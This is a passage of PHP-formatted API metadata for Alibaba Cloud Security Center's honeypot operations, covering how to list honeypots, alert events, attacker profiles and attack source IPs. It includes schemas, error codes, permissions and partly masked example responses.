'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of honeypot IDs.', 'type' => 'array', 'items' => ['description' => 'The honeypot ID.', 'type' => 'string', 'required' => false, 'example' => '76c2a1c72ef259777d96d55a7834e5f5d98f85666c49f76ad9caa447d8b7****', 'title' => ''], 'required' => false, 'maxItems' => 50, 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of honeypot data.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'HoneypotId' => ['title' => '', 'description' => 'The honeypot ID.', 'type' => 'string', 'example' => '76c2a1c72ef259777d96d55a7834e5f5d98f85666c49f76ad9caa447d8b7****'], 'HoneypotName' => ['title' => '', 'description' => 'The name of the honeypot.', 'type' => 'string', 'example' => 'mx-rouyi'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the honeypot management node.', 'type' => 'string', 'example' => '0804-pre'], 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the honeypot image.', 'type' => 'string', 'example' => 'tcp_proxy'], 'PresetId' => ['title' => '', 'description' => 'The ID of the custom honeypot parameter.', 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], 'State' => [ 'title' => '', 'description' => 'The status of the honeypot.', 'type' => 'array', 'items' => ['description' => 'The status of the honeypot. Valid values:'."\n" .'- **starting**: Starting.'."\n" .'- **running**: Normal.'."\n" .'- **exited**: Stopped.'."\n" .'- **upgrade**: Updating.'."\n" .'- **deleting**: Deleting.'."\n" .'- **resetting**: Resetting.'."\n" .'- **created**: Created.'."\n" .'- **stopping**: Stopping.', 'type' => 'string', 'example' => 'running', 'title' => ''], 'example' => '', ], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the honeypot image.', 'type' => 'string', 'example' => 'MongoDB'], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.', 'type' => 'string', 'example' => 'c94eff5b-ea48-4805-8b7f-e04d3509b117'], 'HoneypotImageId' => ['description' => 'The ID of the honeypot image.', 'type' => 'string', 'example' => 'sha256:eca5ced3757e46c24701e9ced4e652f2d730262d5685a4e001da22c4fb418fd4', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries to return per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C80AFF1F-CC20-502C-A4D4-F5433E529B69', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query honeypot list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypot', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneyPot', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypot/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"HoneypotId\\": \\"76c2a1c72ef259777d96d55a7834e5f5d98f85666c49f76ad9caa447d8b7****\\",\\n \\"HoneypotName\\": \\"mx-rouyi\\",\\n \\"ControlNodeName\\": \\"0804-pre\\",\\n \\"HoneypotImageName\\": \\"tcp_proxy\\",\\n \\"PresetId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\",\\n \\"State\\": [\\n \\"running\\"\\n ],\\n \\"HoneypotImageDisplayName\\": \\"MongoDB\\",\\n \\"NodeId\\": \\"c94eff5b-ea48-4805-8b7f-e04d3509b117\\",\\n \\"HoneypotImageId\\": \\"sha256:eca5ced3757e46c24701e9ced4e652f2d730262d5685a4e001da22c4fb418fd4\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 2\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"C80AFF1F-CC20-502C-A4D4-F5433E529B69\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListHoneypotAlarmEvents' => [ 'summary' => 'Queries the information about alert events that are generated.', 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The status of the alert event. Default value: **a**. Valid values:'."\n" ."\n" .'* **a**: all states'."\n" .'* **y**: handled'."\n" .'* **n**: unhandled'."\n", 'type' => 'string', 'required' => false, 'example' => 'a'], ], [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '185.224.XX.XX', 'title' => ''], ], [ 'name' => 'DstIp', 'in' => 'query', 'schema' => ['description' => 'The destination IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '183.224.XX.XX', 'title' => ''], ], [ 'name' => 'RiskLevelList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The risk levels.'."\n", 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'* **2**: low'."\n" .'* **3**: medium'."\n" .'* **4**: high'."\n", 'type' => 'string', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 100. If you leave this parameter empty, 100 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty. We recommend that you set the value to a value no greater than 100.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '100', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PageResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotAlarmEvents' => [ 'description' => 'The alert events.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the array object.'."\n", 'type' => 'object', 'properties' => [ 'AlarmEventId' => ['description' => 'The event ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '940272', 'title' => ''], 'AlarmEventType' => ['description' => 'The type of the alert event.'."\n", 'type' => 'string', 'example' => 'Initial Access', 'title' => ''], 'AlarmEventName' => ['description' => 'The name of the alert event.'."\n", 'type' => 'string', 'example' => 'Attack Honeypot', 'title' => ''], 'AlarmUniqueInfo' => ['description' => 'The unique identifier of the alert event.'."\n", 'type' => 'string', 'example' => '167e6fc0d931917d2059efcd1d00f6ab', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp that indicates the time when the alert event was first detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1658193602000', 'title' => ''], 'LastTime' => ['description' => 'The timestamp that indicates the time when the alert event was last detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1660610772000', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'* **2**: low'."\n" .'* **3**: medium'."\n" .'* **4**: high'."\n", 'type' => 'string', 'example' => '2', 'title' => ''], 'EventCount' => ['description' => 'The total number of times that the alert event was generated.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'OperateStatus' => ['description' => 'The handling status of the alert event. Valid values:'."\n" ."\n" .'* **1**: pending'."\n" .'* **2**: ignored'."\n" .'* **4**: confirmed'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MergeFieldList' => [ 'description' => 'The risk information.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the array object.'."\n", 'type' => 'object', 'properties' => [ 'FieldType' => ['description' => 'The type of the field. You can ignore this internal parameter.'."\n", 'type' => 'string', 'example' => 'level1_item3', 'title' => ''], 'FieldKey' => ['description' => 'The key of the field.'."\n", 'type' => 'string', 'example' => 'dest_ip_count', 'title' => ''], 'FieldValue' => ['description' => 'The value that corresponds to the field key.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'FieldExtInfo' => ['description' => 'The extended value that corresponds to the field key.'."\n", 'type' => 'string', 'example' => 'dest_ip_ext', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: 100.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '513C9554-55A4-5504-B7C4-6E17EB4FC7A3', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HoneypotAlarmEvents\\": [\\n {\\n \\"AlarmEventId\\": 940272,\\n \\"AlarmEventType\\": \\"Initial Access\\",\\n \\"AlarmEventName\\": \\"Attack Honeypot\\",\\n \\"AlarmUniqueInfo\\": \\"167e6fc0d931917d2059efcd1d00f6ab\\",\\n \\"FirstTime\\": 1658193602000,\\n \\"LastTime\\": 1660610772000,\\n \\"RiskLevel\\": \\"2\\",\\n \\"EventCount\\": 11,\\n \\"OperateStatus\\": 1,\\n \\"MergeFieldList\\": [\\n {\\n \\"FieldType\\": \\"level1_item3\\",\\n \\"FieldKey\\": \\"dest_ip_count\\",\\n \\"FieldValue\\": \\"1\\",\\n \\"FieldExtInfo\\": \\"dest_ip_ext\\"\\n }\\n ]\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 2\\n },\\n \\"RequestId\\": \\"513C9554-55A4-5504-B7C4-6E17EB4FC7A3\\"\\n}","type":"json"}]', 'title' => 'ListHoneypotAlarmEvents', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotAlarmEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListHoneypotAttackerPortrait' => [ 'summary' => 'Queries the attacker profile based on the source IP address of the attack.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '158250', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'StartTimeStamp', 'in' => 'query', 'schema' => ['title' => 'start time', 'description' => 'The beginning of the time range to query. The value is a UNIX timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1672249044000'], ], [ 'name' => 'EndTimeStamp', 'in' => 'query', 'schema' => ['title' => 'end time', 'description' => 'The end of the time range to query. The value is a UNIX timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1672285044000'], ], [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['title' => 'source ip', 'description' => 'The source IP address of the attack.', 'type' => 'string', 'required' => false, 'example' => '101.133.155.***'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**. Pages start from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PageResult', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The details of the attacker profile.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'PortraitId' => ['description' => 'The attacker profile ID.', 'type' => 'string', 'example' => 'cd48604a-1694-4f03-ade0-ec6994c3****', 'title' => ''], 'AttackCount' => ['description' => 'The number of attacks.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'LastTime' => ['description' => 'The timestamp at which the attack was last detected. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1679896965', 'title' => ''], 'Host' => [ 'description' => 'The information about the hosts of the attack source.', 'type' => 'array', 'items' => ['description' => 'The information about the host of the attack source.', 'type' => 'string', 'example' => '{"memory":0,"os":"macOS 10.15.7","cpuConcurrency":4,"fonts":["Apple Braille","AppleGothic","Khmer MN","Avenir","Charter","Luminari","PingFang SC","Sukhumvit Set","Rockwell","Plantagenet Cherokee"],"touchSupport":false,"timezone":"Asia/Shanghai","language":"zh-CN","screenResolution":[2560,1440],"render":"ANGLE (Intel Inc., Intel(R) Iris(TM) Plus *** 655, OpenGL 4.1)","hasUnity":false}', 'title' => ''], 'title' => '', 'example' => '', ], 'Browser' => [ 'description' => 'The information about the browsers of the attack source.', 'type' => 'array', 'items' => ['description' => 'The information about the browser of the attack source.', 'type' => 'string', 'example' => '{"is_private":false,"bitness":"","os":"macOS 10.15.7","mobile":false,"webgl_fp2":"487f7b22f68312d2c1bbc93b1*****","fp2":"8b41770fa2b46121dc108801dc3*****","webgl_fp":"487f7b22f68312d2c1bbc93b1*****","version":"107.0.0.0","tid":"s:16697072420106186d4-82704-41d5e3.7c97b18aac8b09ab3eba4584df01df8411fc3d62fc93f3a11ad2431905*****","versionNumber":107,"canvas_fp":"62d2e519ad32dac4da26528fad*****","chrome_ext":[],"name":"Chrome","model":"","arch":"","canvasFingerprint":"62d2e519ad32dac4da26528fad*****","canvas_fp2":"62d2e519ad32dac4da26528fa*****9"}'."\n" ."\n", 'title' => ''], 'title' => '', 'example' => '', ], 'Social' => [ 'description' => 'The social information about the attack source.', 'type' => 'array', 'items' => ['description' => 'The social information about the attack source.', 'type' => 'string', 'example' => '{"baidu":{"valid":true,"data":{"avatar":"https://himg.bdimg.com/sys/portrait/item/public.1.*****.lzyz1JkgdUw******","userName":"山的****994"}}}', 'title' => ''], 'title' => '', 'example' => '', ], 'Network' => [ 'description' => 'The network information about the attack source.', 'type' => 'object', 'properties' => [ 'ExternalIp' => [ 'description' => 'The public IP addresses.', 'type' => 'array', 'items' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '39.105.62.***', 'title' => ''], 'title' => '', 'example' => '', ], 'RealIp' => [ 'description' => 'The originating IP addresses.', 'type' => 'array', 'items' => ['description' => 'The originating IP address.', 'type' => 'string', 'example' => '223.104.150.***', 'title' => ''], 'title' => '', 'example' => '', ], 'InternalIp' => [ 'description' => 'The private IP addresses.', 'type' => 'array', 'items' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '172.17.6.***', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '25', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code that is returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '8A5A2DA6-67EA-5968-960F-6B20FD0C*****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"PortraitId\\": \\"cd48604a-1694-4f03-ade0-ec6994c3****\\",\\n \\"AttackCount\\": 10,\\n \\"LastTime\\": 1679896965,\\n \\"Host\\": [\\n \\"{\\\\\\"memory\\\\\\":0,\\\\\\"os\\\\\\":\\\\\\"macOS 10.15.7\\\\\\",\\\\\\"cpuConcurrency\\\\\\":4,\\\\\\"fonts\\\\\\":[\\\\\\"Apple Braille\\\\\\",\\\\\\"AppleGothic\\\\\\",\\\\\\"Khmer MN\\\\\\",\\\\\\"Avenir\\\\\\",\\\\\\"Charter\\\\\\",\\\\\\"Luminari\\\\\\",\\\\\\"PingFang SC\\\\\\",\\\\\\"Sukhumvit Set\\\\\\",\\\\\\"Rockwell\\\\\\",\\\\\\"Plantagenet Cherokee\\\\\\"],\\\\\\"touchSupport\\\\\\":false,\\\\\\"timezone\\\\\\":\\\\\\"Asia/Shanghai\\\\\\",\\\\\\"language\\\\\\":\\\\\\"zh-CN\\\\\\",\\\\\\"screenResolution\\\\\\":[2560,1440],\\\\\\"render\\\\\\":\\\\\\"ANGLE (Intel Inc., Intel(R) Iris(TM) Plus *** 655, OpenGL 4.1)\\\\\\",\\\\\\"hasUnity\\\\\\":false}\\"\\n ],\\n \\"Browser\\": [\\n \\"{\\\\\\"is_private\\\\\\":false,\\\\\\"bitness\\\\\\":\\\\\\"\\\\\\",\\\\\\"os\\\\\\":\\\\\\"macOS 10.15.7\\\\\\",\\\\\\"mobile\\\\\\":false,\\\\\\"webgl_fp2\\\\\\":\\\\\\"487f7b22f68312d2c1bbc93b1*****\\\\\\",\\\\\\"fp2\\\\\\":\\\\\\"8b41770fa2b46121dc108801dc3*****\\\\\\",\\\\\\"webgl_fp\\\\\\":\\\\\\"487f7b22f68312d2c1bbc93b1*****\\\\\\",\\\\\\"version\\\\\\":\\\\\\"107.0.0.0\\\\\\",\\\\\\"tid\\\\\\":\\\\\\"s:16697072420106186d4-82704-41d5e3.7c97b18aac8b09ab3eba4584df01df8411fc3d62fc93f3a11ad2431905*****\\\\\\",\\\\\\"versionNumber\\\\\\":107,\\\\\\"canvas_fp\\\\\\":\\\\\\"62d2e519ad32dac4da26528fad*****\\\\\\",\\\\\\"chrome_ext\\\\\\":[],\\\\\\"name\\\\\\":\\\\\\"Chrome\\\\\\",\\\\\\"model\\\\\\":\\\\\\"\\\\\\",\\\\\\"arch\\\\\\":\\\\\\"\\\\\\",\\\\\\"canvasFingerprint\\\\\\":\\\\\\"62d2e519ad32dac4da26528fad*****\\\\\\",\\\\\\"canvas_fp2\\\\\\":\\\\\\"62d2e519ad32dac4da26528fa*****9\\\\\\"}\\\\n\\\\n\\"\\n ],\\n \\"Social\\": [\\n \\"{\\\\\\"baidu\\\\\\":{\\\\\\"valid\\\\\\":true,\\\\\\"data\\\\\\":{\\\\\\"avatar\\\\\\":\\\\\\"https://himg.bdimg.com/sys/portrait/item/public.1.*****.lzyz1JkgdUw******\\\\\\",\\\\\\"userName\\\\\\":\\\\\\"山的****994\\\\\\"}}}\\"\\n ],\\n \\"Network\\": {\\n \\"ExternalIp\\": [\\n \\"39.105.62.***\\"\\n ],\\n \\"RealIp\\": [\\n \\"223.104.150.***\\"\\n ],\\n \\"InternalIp\\": [\\n \\"172.17.6.***\\"\\n ]\\n }\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 2,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 25,\\n \\"Count\\": 11\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"8A5A2DA6-67EA-5968-960F-6B20FD0C*****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ListHoneypotAttackerPortrait', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotAttackerPortrait', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListHoneypotAttackerSource' => [ 'summary' => 'Queries the attack source IP addresses that are used to attack a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '158251', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['title' => 'source ip', 'description' => 'The source IP address of the attack.', 'type' => 'string', 'required' => false, 'example' => '175.136.230.***'], ], [ 'name' => 'StartTimeStamp', 'in' => 'query', 'schema' => ['title' => 'start time', 'description' => 'The beginning of the time range to query. This value is a timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1674007632124'], ], [ 'name' => 'EndTimeStamp', 'in' => 'query', 'schema' => ['title' => 'end time', 'description' => 'The end of the time range to query. This value is a timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1676945366221'], ], [ 'name' => 'RiskLevelList', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'title' => 'risk level', 'description' => 'An array that consists of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **2**: low'."\n" ."\n" .'- **3**: medium'."\n" ."\n" .'- **4**: high', 'type' => 'string', 'required' => false, 'example' => '3', 'title' => ''], 'required' => false, 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PageResult', 'description' => 'The data returned by page.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The source IP addresses of the attack.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'EventCount' => ['description' => 'The total number of attack events.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'LastTime' => ['description' => 'The last time when the attack event occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1693446913000', 'title' => ''], 'LastTargetHoneypot' => ['description' => 'The most recent honeypot that was attacked.', 'type' => 'string', 'example' => 'vpc tcp 蜜罐', 'title' => ''], 'LastTargetIp' => ['description' => 'The most recent IP address that was attacked.', 'type' => 'string', 'example' => '144.23.66.***', 'title' => ''], 'SrcIp' => ['description' => 'The source IP address of the attack.', 'type' => 'string', 'example' => '101.102.61.***', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **2**: low'."\n" ."\n" .'- **3**: medium'."\n" ."\n" .'- **4**: high', 'type' => 'string', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '9915DC4D-B4DA-5140-8138-FD80636*****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code that is returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"EventCount\\": 30,\\n \\"LastTime\\": 1693446913000,\\n \\"LastTargetHoneypot\\": \\"vpc tcp 蜜罐\\",\\n \\"LastTargetIp\\": \\"144.23.66.***\\",\\n \\"SrcIp\\": 